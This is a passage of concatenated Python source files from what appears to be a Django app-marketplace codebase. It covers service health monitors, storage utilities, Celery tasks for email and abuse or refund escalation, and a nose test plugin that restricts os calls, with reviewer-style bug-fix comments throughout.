        cls.objects.filter(pk=self.pk).update(**kw)
        if signal:
            models.signals.post_save.send(sender=cls, instance=self,
                                          created=False)
def manual_order(qs, pks, pk_name='id'):
    """
    Given a query set and a list of primary keys, return a set of objects from
    the query set in that exact order.

    ``pk_name`` is the column used both for filtering and for the MySQL
    FIELD() ordering expression.
    """
    if not pks:
        return qs.none()
    # Bug fix: the filter used to hard-code ``id__in`` and silently ignore
    # pk_name, even though FIELD() below respects it.
    return qs.filter(**{'%s__in' % pk_name: pks}).extra(
        select={'_manual': 'FIELD(%s, %s)'
                % (pk_name, ','.join(map(str, pks)))},
        order_by=['_manual'])
class BlobField(models.Field):
    """MySQL blob column.
    This is for using AES_ENCRYPT() to store values.
    It could maybe turn into a fancy transparent encrypt/decrypt field
    like http://djangosnippets.org/snippets/2489/
    """
    description = "blob"

    def db_type(self, **kw):
        # Raw MySQL column type; no Python-side conversion is performed.
        return 'blob'
class SlugField(models.SlugField):
    """
    Django 1.6's SlugField rejects non-ASCII slugs. This field just
    keeps the old behaviour of not checking contents.
    """
    # Emptying default_validators disables the ASCII-only slug check.
    default_validators = []
class FakeEmail(ModelBase):
    # Raw message text, one email per row (table: fake_email).
    # NOTE(review): presumably a capture target for outbound mail in
    # non-production setups -- confirm against the mail backend that
    # writes it.
    message = models.TextField()

    class Meta:
        db_table = 'fake_email'
########NEW FILE########
__FILENAME__ = monitors
import os
import socket
import StringIO
import tempfile
import time
import traceback
from django.conf import settings
import commonware.log
import elasticutils
import requests
from cache_nuggets.lib import memoize
from PIL import Image
from applications.management.commands import dump_apps
from lib.crypto import packaged, receipt
from lib.crypto.packaged import SigningError as PackageSigningError
from lib.crypto.receipt import SigningError
from lib.pay_server import client
monitor_log = commonware.log.getLogger('z.monitor')
def memcache():
    """Check that each configured memcached server is reachable.

    Returns (status_message, results) where results is a list of
    (ip, port, reachable) tuples and status_message is '' when healthy.
    """
    memcache = getattr(settings, 'CACHES', {}).get('default')
    memcache_results = []
    status = ''
    if memcache and 'memcache' in memcache['BACKEND']:
        hosts = memcache['LOCATION']
        using_twemproxy = False
        if not isinstance(hosts, (tuple, list)):
            hosts = [hosts]
        for host in hosts:
            ip, port = host.split(':')
            if ip == '127.0.0.1':
                # A local address means we're talking through twemproxy,
                # so the 2-server requirement below doesn't apply.
                using_twemproxy = True
            s = None
            try:
                s = socket.socket()
                s.connect((ip, int(port)))
            except Exception as e:
                result = False
                status = 'Failed to connect to memcached (%s): %s' % (host, e)
                monitor_log.critical(status)
            else:
                result = True
            finally:
                # Bug fix: socket.socket() itself may have raised, leaving
                # ``s`` unset -- the old unconditional close() would then
                # NameError out of the health check.
                if s is not None:
                    s.close()
            memcache_results.append((ip, port, result))
        if not using_twemproxy and len(memcache_results) < 2:
            status = ('2+ memcache servers are required.'
                      '%s available') % len(memcache_results)
            monitor_log.warning(status)
    if not memcache_results:
        status = 'Memcache is not configured'
        monitor_log.info(status)
    return status, memcache_results
def libraries():
    """Check that required imaging/crypto libraries import and work.

    Returns (status_message, [(name, ok, detail), ...]); status_message is
    '' when nothing is missing.
    """
    # Check Libraries and versions
    libraries_results = []
    status = ''
    try:
        # Round-trip a tiny image to prove PIL was built with JPEG support.
        Image.new('RGB', (16, 16)).save(StringIO.StringIO(), 'JPEG')
        libraries_results.append(('PIL+JPEG', True, 'Got it!'))
    except Exception as e:
        # 'as' form for consistency with the rest of this module.
        msg = "Failed to create a jpeg image: %s" % e
        libraries_results.append(('PIL+JPEG', False, msg))
    try:
        import M2Crypto  # NOQA
        libraries_results.append(('M2Crypto', True, 'Got it!'))
    except ImportError:
        libraries_results.append(('M2Crypto', False, 'Failed to import'))
    if settings.SPIDERMONKEY:
        if os.access(settings.SPIDERMONKEY, os.R_OK):
            libraries_results.append(('Spidermonkey is ready!', True, None))
            # TODO: see if it works?
        else:
            msg = "You said spidermonkey was at (%s)" % settings.SPIDERMONKEY
            libraries_results.append(('Spidermonkey', False, msg))
    else:
        msg = "Please set SPIDERMONKEY in your settings file."
        libraries_results.append(('Spidermonkey', False, msg))
    missing_libs = [l for l, s, m in libraries_results if not s]
    if missing_libs:
        status = 'missing libs: %s' % ",".join(missing_libs)
    return status, libraries_results
def elastic():
    """Report Elasticsearch cluster health; flag red status or errors."""
    status = ''
    elastic_results = None
    try:
        health = elasticutils.get_es().health()
        elastic_results = health
        if health['status'] == 'red':
            status = 'ES is red'
    except Exception:
        monitor_log.exception('Failed to communicate with ES')
        status = 'traceback'
        elastic_results = {'error': traceback.format_exc()}
    return status, elastic_results
def path():
    """Check filesystem paths exist with the required permissions.

    Returns (status_message, [(path, exists, has_perms, notes), ...]);
    status_message is '' when every path checks out.
    """
    # Check file paths / permissions
    rw = (settings.TMP_PATH,
          settings.NETAPP_STORAGE,
          settings.UPLOADS_PATH,
          settings.ADDONS_PATH,
          settings.MIRROR_STAGE_PATH,
          settings.GUARDED_ADDONS_PATH,
          settings.ADDON_ICONS_PATH,
          settings.COLLECTIONS_ICON_PATH,
          settings.PREVIEWS_PATH,
          settings.USERPICS_PATH,
          settings.REVIEWER_ATTACHMENTS_PATH,
          dump_apps.Command.JSON_PATH,)
    r = [os.path.join(settings.ROOT, 'locale'),
         # The deploy process will want write access to this.
         # We do not want Django to have write access though.
         settings.PROD_DETAILS_DIR]
    filepaths = [(path, os.R_OK | os.W_OK, "We want read + write")
                 for path in rw]
    filepaths += [(path, os.R_OK, "We want read") for path in r]
    filepath_results = []
    filepath_status = True
    # NOTE: the loop variable deliberately shadows this function's name;
    # nothing below calls path() recursively.
    for path, perms, notes in filepaths:
        path_exists = os.path.exists(path)
        path_perms = os.access(path, perms)
        filepath_status = filepath_status and path_exists and path_perms
        filepath_results.append((path, path_exists, path_perms, notes))
    key_exists = os.path.exists(settings.WEBAPPS_RECEIPT_KEY)
    key_perms = os.access(settings.WEBAPPS_RECEIPT_KEY, os.R_OK)
    filepath_status = filepath_status and key_exists and key_perms
    filepath_results.append(('settings.WEBAPPS_RECEIPT_KEY',
                             key_exists, key_perms, 'We want read'))
    # Bug fix: removed a dead ``status = filepath_status`` assignment that
    # was immediately overwritten by the line below.
    status = ''
    if not filepath_status:
        status = 'check main status page for broken perms'
    return status, filepath_results
def redis():
    """Ping every configured Redis backend.

    Returns (status_message, {alias: info-dict-or-None}); status_message is
    '' when all backends answered.
    """
    # Check Redis
    redis_results = [None, 'REDIS_BACKENDS is not set']
    status = 'REDIS_BACKENDS is not set'
    if getattr(settings, 'REDIS_BACKENDS', False):
        import redisutils
        status = []
        redis_results = {}
        for alias, redis in redisutils.connections.iteritems():
            try:
                redis_results[alias] = redis.info()
            except Exception, e:
                # Record the failure per-alias but keep checking the rest.
                redis_results[alias] = None
                status.append('Failed to chat with redis:%s' % alias)
                monitor_log.critical('Failed to chat with redis: (%s)' % e)
        status = ','.join(status)
    return status, redis_results
# The signer check actually asks the signing server to sign something. Do this
# once per nagios check, once per web head might be a bit much. The memoize
# slows it down a bit, by caching the result for 15 seconds.
@memoize('monitors-signer', time=15)
def receipt_signer():
    """End-to-end check of the receipt signing service.

    Signs a dummy receipt, cracks it back open, then verifies the signing
    cert is not about to expire and that its public cert URL serves valid
    JSON containing a JWK. Returns (status_message, detail);
    status_message is '' on success.
    """
    destination = getattr(settings, 'SIGNING_SERVER', None)
    if not destination:
        return '', 'Signer is not configured.'
    # Just send some test data into the signer.
    now = int(time.time())
    not_valid = (settings.SITE_URL + '/not-valid')
    data = {'detail': not_valid, 'exp': now + 3600, 'iat': now,
            'iss': settings.SITE_URL,
            'product': {'storedata': 'id=1', 'url': u'http://not-valid.com'},
            'nbf': now, 'typ': 'purchase-receipt',
            'reissue': not_valid,
            'user': {'type': 'directed-identifier',
                     'value': u'something-not-valid'},
            'verify': not_valid
            }
    try:
        result = receipt.sign(data)
    except SigningError as err:
        msg = 'Error on signing (%s): %s' % (destination, err)
        return msg, msg
    try:
        cert, rest = receipt.crack(result)
    except Exception as err:
        msg = 'Error on cracking receipt (%s): %s' % (destination, err)
        return msg, msg
    # Check that the certs used to sign the receipts are not about to expire.
    limit = now + (60 * 60 * 24)  # One day.
    if cert['exp'] < limit:
        msg = 'Cert will expire soon (%s)' % destination
        return msg, msg
    cert_err_msg = 'Error on checking public cert (%s): %s'
    location = cert['iss']
    try:
        resp = requests.get(location, timeout=5, stream=False)
    except Exception as err:
        msg = cert_err_msg % (location, err)
        return msg, msg
    if not resp.ok:
        msg = cert_err_msg % (location, resp.reason)
        return msg, msg
    cert_json = resp.json()
    # Idiom fix: 'x not in y' instead of 'not x in y'.
    if not cert_json or 'jwk' not in cert_json:
        msg = cert_err_msg % (location, 'Not valid JSON/JWK')
        return msg, msg
    return '', 'Signer working and up to date'
# Like the receipt signer above this asks the packaged app signing
# service to sign one for us.
@memoize('monitors-package-signer', time=60)
def package_signer():
    """Ask the packaged-app signing server to sign a known-good zip.

    Returns (status_message, detail); status_message is '' on success.
    """
    destination = getattr(settings, 'SIGNED_APPS_SERVER', None)
    if not destination:
        return '', 'Signer is not configured.'
    app_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
                            'nagios_check_packaged_app.zip')
    # NOTE: mktemp() only reserves a name (racy, but sign_app wants to
    # create the file itself).
    signed_path = tempfile.mktemp()
    try:
        packaged.sign_app(app_path, signed_path, None, False)
        return '', 'Package signer working'
    except PackageSigningError as e:
        msg = 'Error on package signing (%s): %s' % (destination, e)
        return msg, msg
    finally:
        # Bug fix: if signing failed before the output file was created,
        # the old unconditional unlink raised OSError here and masked the
        # real failure.
        if os.path.exists(signed_path):
            os.unlink(signed_path)
# Not called settings to avoid conflict with django.conf.settings.
def settings_check():
    """Verify the in-app payment settings are all present and non-empty."""
    required = ('APP_PURCHASE_KEY', 'APP_PURCHASE_TYP', 'APP_PURCHASE_AUD',
                'APP_PURCHASE_SECRET')
    missing = [key for key in required if not getattr(settings, key)]
    if missing:
        # Report the first missing key, matching the original short-circuit.
        msg = 'Missing required value %s' % missing[0]
        return msg, msg
    return '', 'Required settings ok'
def solitude():
    """Check the Solitude payment server responds and authenticates us."""
    try:
        res = client.api.services.request.get()
    except Exception as err:
        return repr(err), repr(err)
    auth = res.get('authenticated', None)
    if auth == 'marketplace':
        return '', 'Solitude authentication ok'
    msg = 'Solitude authenticated as: %s' % auth
    return msg, msg
########NEW FILE########
__FILENAME__ = pyquery_wrapper
"""
If libxml2 finds a <noscript> element in <head>, it appears to create a <body>
block right there and drop our real <body>, which has nice attributes we'd like
to see. So we'll regex out all those nasty <noscript>s and pretend everything
is just right.
The libxml2 bug is https://bugzilla.gnome.org/show_bug.cgi?id=615785.
"""
import re
import pyquery
# Yes, we're munging HTML with a regex. Deal with it.
# NOTE(review): no re.DOTALL, so only single-line <noscript> blocks are
# matched -- presumably sufficient for the markup under test; confirm
# before widening.
noscript_re = re.compile('<noscript>.*?</noscript>')
def remove_noscript_from_head(html):
    """Strip <noscript> elements from the <head> portion of ``html``.

    Bug fix: when no </head> is present, str.find returns -1, which used
    to chop the final character and scrub noscripts from the whole
    document; now the input is returned unchanged in that case.
    """
    head_end = html.find('</head>')
    if head_end == -1:
        return html
    new_head = noscript_re.sub('', html[:head_end])
    return new_head + html[head_end:]
class PyQuery(pyquery.PyQuery):
    # Works around the libxml2 <noscript>-in-<head> bug described in this
    # module's docstring by scrubbing noscript tags before parsing.
    def __init__(self, *args, **kwargs):
        # Only munge literal markup, not a URL that pyquery would fetch.
        if (args and isinstance(args[0], basestring) and
            not args[0].startswith('http')):
            args = (remove_noscript_from_head(args[0]),) + args[1:]
        super(PyQuery, self).__init__(*args, **kwargs)
########NEW FILE########
__FILENAME__ = runner
from django.conf import settings
from django.db.models import loading
from test_utils.runner import RadicalTestSuiteRunner
class RadicalTestSuiteRunnerWithExtraApps(RadicalTestSuiteRunner):
    """Test runner that appends settings.TEST_INSTALLED_APPS to INSTALLED_APPS."""

    def setup_test_environment(self, **kwargs):
        rval = super(RadicalTestSuiteRunnerWithExtraApps,
                     self).setup_test_environment(**kwargs)
        # NOTE(review): getattr without a default raises AttributeError if
        # TEST_INSTALLED_APPS is unset -- presumably always defined in the
        # settings; confirm.
        extra_apps = getattr(settings, 'TEST_INSTALLED_APPS')
        if extra_apps:
            installed_apps = getattr(settings, 'INSTALLED_APPS')
            setattr(settings, 'INSTALLED_APPS', installed_apps + extra_apps)
            # Force Django's app cache to re-scan the enlarged list.
            loading.cache.loaded = False
        return rval
########NEW FILE########
__FILENAME__ = signals
import contextlib
from django import http
from django.conf import settings
from django.db import models
from . import urlresolvers
def flush_front_end_cache(sender, instance, **kwargs):
    """post_save/post_delete receiver: queue a front-end cache flush.

    ``instance.flush_urls`` may be a list of URLs or a callable returning
    one; when absent or empty, nothing is queued.
    """
    from . import tasks
    flush = getattr(instance, 'flush_urls', None)
    if callable(flush):
        urls = flush()
    else:
        urls = flush
    if urls:
        tasks.flush_front_end_cache_urls.apply_async(args=[urls])
def _connect():
    # Flush the front-end cache whenever any model is saved or deleted.
    models.signals.post_save.connect(flush_front_end_cache)
    models.signals.post_delete.connect(flush_front_end_cache)
def _disconnect():
    # Stop flushing the front-end cache on model saves/deletes.
    models.signals.post_save.disconnect(flush_front_end_cache)
    models.signals.post_delete.disconnect(flush_front_end_cache)
@contextlib.contextmanager
def hera_disabled():
    """Suspend front-end (Hera) cache flushing for the duration of the block."""
    _disconnect()
    try:
        yield
    finally:
        _connect()
## Hook up test signals here, for lack of a better spot.
def clean_url_prefixes(sender, **kwargs):
    """Wipe the URL prefixer(s) after each test."""
    # Delegates to urlresolvers so the next test starts with no cached
    # prefix state.
    urlresolvers.clean_url_prefixes()
def default_prefixer(sender, **kwargs):
    """Install a fresh URL prefixer with the default app/locale for a test."""
    # A minimal fake request is enough for Prefixer's constructor.
    fake_request = http.HttpRequest()
    fake_request.META['SCRIPT_NAME'] = ''
    prefixer = urlresolvers.Prefixer(fake_request)
    prefixer.app = settings.DEFAULT_APP
    prefixer.locale = settings.LANGUAGE_CODE
    urlresolvers.set_url_prefix(prefixer)
# Register Django signals this app listens to.
try:
    import test_utils.signals
except ImportError:
    # test_utils is presumably absent outside dev/test environments;
    # nothing to hook up then.
    pass
else:
    # Clean up URL prefix cache when a new test is invoked.
    test_utils.signals.pre_setup.connect(default_prefixer)
    test_utils.signals.post_teardown.connect(clean_url_prefixes)
########NEW FILE########
__FILENAME__ = storage_utils
"""
Utilities for working with the Django Storage API.
A lot of these methods assume the use of a storage backend that does not
require leading directories to exist. The default Django file system storage
*will* sometimes require leading directories to exist.
"""
from django.core.files.storage import default_storage
from django.utils.encoding import smart_str
DEFAULT_CHUNK_SIZE = 64 * 2 ** 10 # 64kB
def walk_storage(path, topdown=True, onerror=None, followlinks=False,
                 storage=default_storage):
    """
    Generate the file names in a stored directory tree by walking the tree
    top-down, like os.walk() but against a Django storage backend.

    For each directory in the tree rooted at ``path`` (including ``path``
    itself), yields a 3-tuple (dirpath, dirnames, filenames).

    Only topdown=True and onerror=None are supported; ``followlinks`` is
    accepted for signature parity with os.walk() but ignored.
    """
    if not topdown:
        raise NotImplementedError
    if onerror:
        raise NotImplementedError
    roots = [path]
    # Idiom fix: test the list's truthiness instead of len().
    while roots:
        new_roots = []
        for root in roots:
            dirs, files = storage.listdir(root)
            files = [smart_str(f) for f in files]
            dirs = [smart_str(d) for d in dirs]
            yield root, dirs, files
            # Queue subdirectories for the next level of the walk.
            for dn in dirs:
                new_roots.append('%s/%s' % (root, dn))
        roots[:] = new_roots
def copy_stored_file(src_path, dest_path, storage=default_storage,
                     chunk_size=DEFAULT_CHUNK_SIZE):
    """
    Copy one storage path to another in ``chunk_size`` pieces.
    Both paths are managed by the same storage implementation; copying a
    path onto itself is a no-op.
    """
    if src_path == dest_path:
        return
    with storage.open(src_path, 'rb') as src:
        with storage.open(dest_path, 'wb') as dest:
            while True:
                chunk = src.read(chunk_size)
                if not chunk:
                    break
                dest.write(chunk)
def move_stored_file(src_path, dest_path, storage=default_storage,
                     chunk_size=DEFAULT_CHUNK_SIZE):
    """
    Move a storage path to another storage path.
    The source file will be copied to the new path then deleted.
    This attempts to be compatible with a wide range of storage backends
    rather than attempt to be optimized for each individual one.
    """
    # Copy-then-delete, not rename: the generic storage API has no move.
    copy_stored_file(src_path, dest_path, storage=storage,
                     chunk_size=chunk_size)
    storage.delete(src_path)
def rm_stored_dir(dir_path, storage=default_storage):
    """
    Remove a stored directory and every file stored beneath that path.
    """
    seen_dirs = []
    # Files go first; directories are then removed deepest-first (each
    # root is pushed to the front, so the list ends up depth-reversed).
    for root, dirs, files in walk_storage(dir_path):
        for name in files:
            storage.delete('%s/%s' % (root, name))
        seen_dirs.insert(0, root)
    seen_dirs.append(dir_path)
    for directory in seen_dirs:
        storage.delete(directory)
########NEW FILE########
__FILENAME__ = tasks
import datetime
from django.conf import settings
from django.core.mail import EmailMessage, EmailMultiAlternatives
import commonware.log
import phpserialize
from celeryutils import task
from hera.contrib.django_utils import flush_urls
import amo
from abuse.models import AbuseReport
from addons.models import Addon
from amo.decorators import set_task_user
from amo.utils import get_email_backend
from devhub.models import ActivityLog, AppLog
from editors.models import EscalationQueue, EventLog
from reviews.models import Review
from mkt.prices.models import Refund
log = commonware.log.getLogger('z.task')
@task
def send_email(recipient, subject, message, from_email=None,
               html_message=None, attachments=None, real_email=False,
               cc=None, headers=None, fail_silently=False, async=False,
               max_retries=None, **kwargs):
    """Celery task that builds and sends a single email.

    Uses EmailMultiAlternatives when an HTML body is supplied, otherwise a
    plain EmailMessage. Returns True on success; on failure, retries the
    task (async=True), re-raises (fail_silently=False), or returns False.
    NOTE(review): ``async`` became a keyword in Python 3.7 -- renaming it
    would break keyword callers, so it stays while this is Python 2 code.
    """
    backend = EmailMultiAlternatives if html_message else EmailMessage
    connection = get_email_backend(real_email)
    result = backend(subject, message,
                     from_email, recipient, cc=cc, connection=connection,
                     headers=headers, attachments=attachments)
    if html_message:
        result.attach_alternative(html_message, 'text/html')
    try:
        # fail_silently is handled in the except clause below so we can
        # distinguish retry vs. swallow; the backend itself always raises.
        result.send(fail_silently=False)
        return True
    except Exception as e:
        log.error('send_mail failed with error: %s' % e)
        if async:
            return send_email.retry(exc=e, max_retries=max_retries)
        elif not fail_silently:
            raise
        else:
            return False
@task
def flush_front_end_cache_urls(urls, **kw):
    """Push a list of URLs through Hera to purge the front-end cache.

    Fire-and-forget: no verification that the URLs were cached or that
    the flush succeeded.
    """
    if not urls:
        return
    log.info(u"Flushing %d URLs from front end cache: (%s)" % (len(urls),
                                                               urls))
    # Zeus is only interested in complete URLs. We can't just pass a
    # prefix to Hera because some URLs will be on SAMO.
    for index, url in enumerate(urls):
        if url.startswith('http'):
            continue
        base = settings.SERVICES_URL if '/api/' in url else settings.SITE_URL
        urls[index] = u"%s%s" % (base, url)
    flush_urls(urls)
@task
def set_modified_on_object(obj, **kw):
    """Sets modified on one object at a time."""
    try:
        log.info('Setting modified on object: %s, %s' %
                 (obj.__class__.__name__, obj.pk))
        obj.update(modified=datetime.datetime.now(), **kw)
    except Exception, e:
        # Best effort: log and swallow so one bad object doesn't kill the
        # batch that queued these tasks.
        log.error('Failed to set modified on: %s, %s - %s' %
                  (obj.__class__.__name__, obj.pk, e))
@task
def delete_logs(items, **kw):
    """Delete the given ActivityLog rows, except actions in amo.LOG_KEEP."""
    log.info('[%s@%s] Deleting logs' % (len(items), delete_logs.rate_limit))
    ActivityLog.objects.filter(pk__in=items).exclude(
        action__in=amo.LOG_KEEP).delete()
@task
def delete_incomplete_addons(items, **kw):
    """Delete add-ons from ``items`` whose status never left 0 (incomplete)."""
    log.info('[%s@%s] Deleting incomplete add-ons' %
             (len(items), delete_incomplete_addons.rate_limit))
    for addon in Addon.objects.filter(
            highest_status=0, status=0, pk__in=items):
        try:
            addon.delete('Deleted for incompleteness')
        except Exception as e:
            # Keep going; one failed delete shouldn't stop the batch.
            log.error("Couldn't delete add-on %s: %s" % (addon.id, e))
@task
def migrate_editor_eventlog(items, **kw):
    """One-off migration: copy legacy EventLog rows into the activity log."""
    log.info('[%s@%s] Migrating eventlog items' %
             (len(items), migrate_editor_eventlog.rate_limit))
    for item in EventLog.objects.filter(pk__in=items):
        kw = dict(user=item.user, created=item.created)
        if item.action == 'review_delete':
            details = None
            try:
                # Legacy rows stored details as PHP-serialized blobs.
                details = phpserialize.loads(item.notes)
            except ValueError:
                pass
            amo.log(amo.LOG.DELETE_REVIEW, item.changed_id, details=details,
                    **kw)
        elif item.action == 'review_approve':
            try:
                r = Review.objects.get(pk=item.changed_id)
                amo.log(amo.LOG.ADD_REVIEW, r, r.addon, **kw)
            except Review.DoesNotExist:
                log.warning("Couldn't find review for %d" % item.changed_id)
@task
@set_task_user
def find_abuse_escalations(addon_id, **kw):
    """Escalate an app that has drawn many abuse reports in the past week,
    unless it is already queued or was already escalated for these reports."""
    weekago = datetime.date.today() - datetime.timedelta(days=7)
    add_to_queue = True
    for abuse in AbuseReport.recent_high_abuse_reports(1, weekago, addon_id):
        if EscalationQueue.objects.filter(addon=abuse.addon).exists():
            # App is already in the queue, no need to re-add it.
            log.info(u'[addon:%s] High abuse reports, but already escalated' %
                     (abuse.addon,))
            add_to_queue = False
        # We have an abuse report... has it been detected and dealt with?
        logs = (AppLog.objects.filter(
            activity_log__action=amo.LOG.ESCALATED_HIGH_ABUSE.id,
            addon=abuse.addon).order_by('-created'))
        if logs:
            abuse_since_log = AbuseReport.recent_high_abuse_reports(
                1, logs[0].created, addon_id)
            # If no abuse reports have happened since the last logged abuse
            # report, do not add to queue.
            if not abuse_since_log:
                log.info(u'[addon:%s] High abuse reports, but none since last '
                         u'escalation' % abuse.addon)
                continue
        # If we haven't bailed out yet, escalate this app.
        msg = u'High number of abuse reports detected'
        if add_to_queue:
            EscalationQueue.objects.create(addon=abuse.addon)
        amo.log(amo.LOG.ESCALATED_HIGH_ABUSE, abuse.addon,
                abuse.addon.current_version, details={'comments': msg})
        log.info(u'[addon:%s] %s' % (abuse.addon, msg))
@task
@set_task_user
def find_refund_escalations(addon_id, **kw):
    """Escalate an app whose 7-day refund ratio exceeds 5%, unless it is
    already queued or the ratio hasn't grown since the last escalation."""
    try:
        addon = Addon.objects.get(pk=addon_id)
    except Addon.DoesNotExist:
        log.info(u'[addon:%s] Task called but no addon found.' % addon_id)
        return
    # 5% of purchases refunded within the last week triggers escalation.
    refund_threshold = 0.05
    weekago = datetime.date.today() - datetime.timedelta(days=7)
    add_to_queue = True
    ratio = Refund.recent_refund_ratio(addon.id, weekago)
    if ratio > refund_threshold:
        if EscalationQueue.objects.filter(addon=addon).exists():
            # App is already in the queue, no need to re-add it.
            log.info(u'[addon:%s] High refunds, but already escalated' % addon)
            add_to_queue = False
        # High refunds... has it been detected and dealt with already?
        logs = (AppLog.objects.filter(
            activity_log__action=amo.LOG.ESCALATED_HIGH_REFUNDS.id,
            addon=addon).order_by('-created', '-id'))
        if logs:
            since_ratio = Refund.recent_refund_ratio(addon.id, logs[0].created)
            # If not high enough ratio since the last logged, do not add to
            # the queue.
            if not since_ratio > refund_threshold:
                log.info(u'[addon:%s] High refunds, but not enough since last '
                         u'escalation. Ratio: %.0f%%' % (addon,
                                                         since_ratio * 100))
                return
        # If we haven't bailed out yet, escalate this app.
        msg = u'High number of refund requests (%.0f%%) detected.' % (
            (ratio * 100),)
        if add_to_queue:
            EscalationQueue.objects.create(addon=addon)
        amo.log(amo.LOG.ESCALATED_HIGH_REFUNDS, addon,
                addon.current_version, details={'comments': msg})
        log.info(u'[addon:%s] %s' % (addon, msg))
########NEW FILE########
__FILENAME__ = models
from django.db import models
from amo import fields
class DecimalCharFieldModel(models.Model):
    """Test-only model exercising amo.fields.DecimalCharField variants."""
    # Rejects invalid decimal input (no nullify_invalid).
    strict = fields.DecimalCharField(max_digits=10, decimal_places=2)
    # nullify_invalid=True: invalid input is presumably stored as NULL
    # instead of raising -- see amo.fields for the exact semantics.
    loose = fields.DecimalCharField(max_digits=10, decimal_places=2,
                                    nullify_invalid=True, null=True)
########NEW FILE########
__FILENAME__ = ospatch
"""
Nose plugin to restrict access to blacklisted os modules.
Activate by running nosetests --with-ospatch or like this in local settings:
NOSE_PLUGINS = [
'amo.tests.ospatch.OSPatch',
]
NOSE_ARGS = [
'--with-ospatch',
]
This was originally made to
help identify code that needed to be ported to the Django storage API.
After breaking/fixing the tests, this command was also useful:
egrep '\bos\..*' -R apps/ | grep -v 'os.path' | grep -v 'link.os' | grep -v 'os.environ' | egrep -v 'os\.[A-Z]' | less
"""
import logging
import os
import re
from traceback import extract_stack
from nose.plugins import Plugin
log = logging.getLogger('nose.plugins.ospatch')
class OSRestricted(Exception):
    """Raised when a patched os.* function is called from non-whitelisted code."""
    pass
class OSPatch(Plugin):
    """Nose plugin that wraps most ``os`` functions in _Patch so direct
    os usage from AMO code can be detected during tests."""
    name = 'ospatch'
    score = -1  # load after all other plugins

    def options(self, parser, env=os.environ):
        super(OSPatch, self).options(parser, env=env)
        self.parser = parser

    def configure(self, options, conf):
        super(OSPatch, self).configure(options, conf)
        if not self.enabled:
            return
        self.cmd_options = options
        self.config = conf

    def begin(self):
        log.info('Patching os!')
        import amo
        # e.g. /path/to/zamboni/apps
        amo_path = os.path.abspath(os.path.join(
            os.path.dirname(amo.__file__), '..'))
        # Wrap everything in os except the harmless names below, dunders,
        # and capitalized constants/classes.
        for name in dir(os):
            if (name not in ('altsep',
                             'curdir',
                             'error',
                             'errno',
                             'extsep',
                             'getenv',
                             'environ',
                             'getcwd',
                             'getpid',
                             'linesep',
                             'lstat',
                             'name',
                             'pardir',
                             'path',
                             'pathsep',
                             'putenv',
                             'sep',
                             'setenv',
                             'strerror',
                             'stat',
                             'sys',
                             'uname',
                             'urandom',)
                and not name.startswith('_')
                and not name[0].isupper()):
                setattr(os, name, _Patch(amo_path, getattr(os, name)))
class _Patch(object):
    """Callable wrapper installed over os.* functions by OSPatch.

    On each call, walks the current stack: calls originating from AMO code
    must pass through a whitelisted frame (storage API, tempfile, test
    helpers, ...) or OSRestricted is raised. Non-AMO callers are always
    allowed.
    """

    def __init__(self, amo_path, orig):
        self.amo_path = amo_path
        self.orig = orig

    def __call__(self, *args, **kw):
        allow_call = False
        is_amo = False
        for filename, lineno, fn, text in extract_stack():
            file_fn = '%s:%s' % (filename, fn)
            if os.path.abspath(filename).startswith(self.amo_path):
                is_amo = True
            # Bug fix: this condition previously ended with a stray
            # trailing comma, turning it into a one-element tuple that is
            # always truthy -- so allow_call was set on every iteration
            # and the plugin never restricted anything.
            if ('settings_test.py' in filename
                # Ignore whitelisted lib usage.
                or 'tempfile.py' in filename
                or 'random.py' in filename
                or '/PIL/' in filename
                # Ignore storage API.
                or 'django/core/files/storage.py:open' in file_fn
                or 'django/core/files/storage.py:exists' in file_fn
                or 'django/core/files/storage.py:listdir' in file_fn
                or 'django/core/files/storage.py:path' in file_fn
                or 'django/core/files/storage.py:size' in file_fn
                or 'django/core/files/storage.py:url' in file_fn
                or 'django/core/files/storage.py:save' in file_fn
                or 'django/core/files/storage.py:delete' in file_fn
                or 'amo/utils.py:path' in file_fn  # storage API
                # These need to operate on local files.
                or 'amo/utils.py:rm_local_tmp_dir' in file_fn
                or 'amo/utils.py:rm_local_tmp_file' in file_fn
                or 'files/utils.py:extract_xpi' in file_fn
                or 'payments/models.py:generate_private_key' in file_fn
                # Ignore some test code.
                or 'tests/test_views_edit.py:setup_image_status' in file_fn
                or 'search/tests/__init__.py:setUp' in file_fn
                or 'amo/tests/__init__.py:xpi_copy_over' in file_fn):
                allow_call = True
        if not is_amo:
            # Only detect incorrect os usage in AMO.
            allow_call = True
        if allow_call:
            return self.orig(*args, **kw)
        raise OSRestricted('cannot call %s' % self.orig)
########NEW FILE########
__FILENAME__ = test_amo_utils
# -*- coding: utf-8 -*-
import os
import tempfile
import unittest
from django.conf import settings
from django.core.cache import cache
from django.core.validators import ValidationError
from django.utils import translation
import mock
from nose.tools import eq_, assert_raises, raises
from amo.utils import (cache_ns_key, escape_all, find_language,
LocalFileStorage, no_translation, resize_image,
rm_local_tmp_dir, slugify, slug_validator, to_language)
from product_details import product_details
from translations.models import Translation
u = u'Ελληνικά'
def test_slug_validator():
    """Valid slugs pass; dotted, spaced, and slashed strings are rejected."""
    for good in (u.lower(), '-'.join([u.lower(), u.lower()])):
        eq_(slug_validator(good), None)
    for bad in ('234.add', 'a a a', 'tags/'):
        assert_raises(ValidationError, slug_validator, bad)
def test_slugify():
    """slugify() lowercases, drops punctuation, and hyphenates; each result
    must also satisfy slug_validator (nose generator test)."""
    x = '-'.join([u, u])
    y = ' - '.join([u, u])

    def check(x, y):
        eq_(slugify(x), y)
        slug_validator(slugify(x))

    s = [('xx x - "#$@ x', 'xx-x-x'),
         (u'Bän...g (bang)', u'bäng-bang'),
         (u, u.lower()),
         (x, x.lower()),
         (y, x.lower()),
         (' a ', 'a'),
         ('tags/', 'tags'),
         ('holy_wars', 'holy_wars'),
         # I don't really care what slugify returns. Just don't crash.
         (u'x荿', u'x\u837f'),
         (u'ϧ蒬蓣', u'\u03e7\u84ac\u84e3'),
         (u'¿x', u'x'),
         ]
    for val, expected in s:
        yield check, val, expected
def test_resize_image():
    """resize_image() must refuse identical src and dst paths."""
    # src and dst shouldn't be the same.
    assert_raises(Exception, resize_image, 't', 't', 'z')
def test_resize_transparency():
    """Resizing a transparent PNG must match the checked-in expected file
    byte-for-byte; the temp output is removed even on failure."""
    src = os.path.join(settings.ROOT, 'apps', 'amo', 'tests',
                       'images', 'transparent.png')
    dest = tempfile.mkstemp(dir=settings.TMP_PATH)[1]
    expected = src.replace('.png', '-expected.png')
    try:
        resize_image(src, dest, (32, 32), remove_src=False, locally=True)
        with open(dest) as dfh:
